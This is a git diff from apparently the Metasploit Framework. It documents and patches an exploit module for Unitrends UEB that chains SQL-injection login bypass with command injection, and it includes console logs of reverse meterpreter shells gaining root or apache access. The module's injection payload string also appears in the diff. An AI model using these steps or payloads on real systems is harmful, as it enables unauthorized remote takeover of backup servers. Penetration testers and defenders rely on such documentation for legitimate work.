diff --git a/documentation/modules/exploit/linux/http/ueb_api_rce.md b/documentation/modules/exploit/linux/http/ueb_api_rce.md new file mode 100644 index 0000000000..7ffdcbd305 --- /dev/null +++ b/documentation/modules/exploit/linux/http/ueb_api_rce.md @@ -0,0 +1,93 @@ +## Vulnerable Application + +This exploit leverages a sqli vulnerability for authentication bypass, +together with command injection for subsequent RCE. + +This exploit has two targets: + + 1. Unitrends UEB 9 http api/storage RCE for root privileges + 2. Unitrends UEB < 10.1.0 api/hosts RCE for user (apache) privileges + +## Verification Steps + + 1. ```use exploit/linux/http/ueb_api_rce``` + 2. ```set lhost [IP]``` + 3. ```set rhost [IP]``` + 4. ```set target [#]``` + 5. ```exploit``` + 6. A meterpreter session should have been opened successfully + +## Scenarios + +### UEB 9.2 on CentOS 6.5 Using api/storage (target 0) root exploit + +``` +msf5 > use exploit/linux/http/ueb_api_rce +msf5 exploit(linux/http/ueb_api_rce) > set target 0 +target => 0 +msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 +rhost => 1.1.1.1 +msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +msf5 exploit(linux/http/ueb_api_rce) > exploit + +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] 1.1.1.1:443 - Sending requests to UEB... +[*] Command Stager progress - 19.76% done (164/830 bytes) +[*] Command Stager progress - 39.16% done (325/830 bytes) +[*] Command Stager progress - 56.87% done (472/830 bytes) +[*] Command Stager progress - 74.82% done (621/830 bytes) +[*] Command Stager progress - 92.77% done (770/830 bytes) +[*] Command Stager progress - 110.48% done (917/830 bytes) +[*] Sending stage (861480 bytes) to 1.1.1.1 +[*] Command Stager progress - 126.63% done (1051/830 bytes) +[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43600) at 2018-09-10 20:51:16 -0400 + +meterpreter > sysinfo +Computer : 1.1.1.1 +OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64) +Architecture : x64 +BuildTuple : i486-linux-musl +Meterpreter : x86/linux +meterpreter > getuid +Server username: uid=0, gid=0, euid=0, egid=0 +``` + +### UEB 9.2 on CentOS 6.5 Using api/hosts (target 1) exploit + +``` +msf5 > use exploit/linux/http/ueb_api_rce +msf5 exploit(linux/http/ueb_api_rce) > set target 1 +target => 1 +msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 +rhost => 1.1.1.1 +msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +msf5 exploit(linux/http/ueb_api_rce) > exploit + +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] 1.1.1.1:443 - Sending requests to UEB... +[*] Command Stager progress - 19.76% done (164/830 bytes) +[*] Command Stager progress - 39.16% done (325/830 bytes) +[*] Command Stager progress - 56.87% done (472/830 bytes) +[*] Command Stager progress - 74.82% done (621/830 bytes) +[*] Command Stager progress - 92.77% done (770/830 bytes) +[*] Command Stager progress - 110.48% done (917/830 bytes) +[*] Sending stage (861480 bytes) to 1.1.1.1 +[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43515) at 2018-09-10 20:46:24 -0400 +[*] Command Stager progress - 126.63% done (1051/830 bytes) + +meterpreter > sysinfo +Computer : 1.1.1.1 +OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64) +Architecture : x64 +BuildTuple : i486-linux-musl +Meterpreter : x86/linux +meterpreter > getuid +Server username: uid=48, gid=48, euid=48, egid=48 +meterpreter > shell +Process 25534 created. +Channel 1 created. +whoami +apache +``` diff --git a/documentation/modules/exploit/linux/http/ueb_api_rce.rb b/documentation/modules/exploit/linux/http/ueb_api_rce.rb deleted file mode 100644 index 05abde08c9..0000000000 --- a/documentation/modules/exploit/linux/http/ueb_api_rce.rb +++ /dev/null @@ -1,42 +0,0 @@ -## Vulnerable Application - - Unitrends UEB 9 http api/storage remote root - - This exploit leverages a sqli vulnerability for authentication bypass, - together with command injection for subsequent root RCE. - -## Verification Steps - - 1. ```use exploit/linux/http/ueb9_api_storage ``` - 2. ```set lhost [IP]``` - 3. ```set rhost [IP]``` - 4. ```exploit``` - 5. A meterpreter session should have been opened successfully - -## Scenarios - -### UEB 9.1 on CentOS 6.5 - -``` -msf > use exploit/linux/http/ueb9_api_storage -msf exploit(ueb9_api_storage) > set rhost 10.0.0.230 -rhost => 10.0.0.230 -msf exploit(ueb9_api_storage) > set lhost 10.0.0.141 -lhost => 10.0.0.141 -msf exploit(ueb9_api_storage) > exploit - -[*] Started reverse TCP handler on 10.0.0.141:4444 -[*] 10.0.0.230:443 - pwn'ng ueb 9.... -[*] Command Stager progress - 19.83% done (164/827 bytes) -[*] Command Stager progress - 39.30% done (325/827 bytes) -[*] Command Stager progress - 57.44% done (475/827 bytes) -[*] Command Stager progress - 75.45% done (624/827 bytes) -[*] Command Stager progress - 93.35% done (772/827 bytes) -[*] Command Stager progress - 110.88% done (917/827 bytes) -[*] Sending stage (826872 bytes) to 10.0.0.230 -[*] Command Stager progress - 126.72% done (1048/827 bytes) -[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400 - -meterpreter > getuid -Server username: uid=0, gid=0, euid=0, egid=0 -``` \ No newline at end of file diff --git a/modules/exploits/linux/http/ueb_api_rce.rb b/modules/exploits/linux/http/ueb_api_rce.rb index 259b156233..b52b573d6f 100644 --- a/modules/exploits/linux/http/ueb_api_rce.rb +++ b/modules/exploits/linux/http/ueb_api_rce.rb @@ -97,8 +97,8 @@ class MetasploitModule < Msf::Exploit::Remote uri = '/api/storage' elsif target.name == 'UEB < 10.1.0' parms = %Q|{"name":"ffff","ip":"10.0.0.200'\\"`0&| - params << filter_bad_chars(cmd) - params << %Q|`'"}| + parms << filter_bad_chars(cmd) + parms << %Q|`'"}| uri = '/api/hosts' end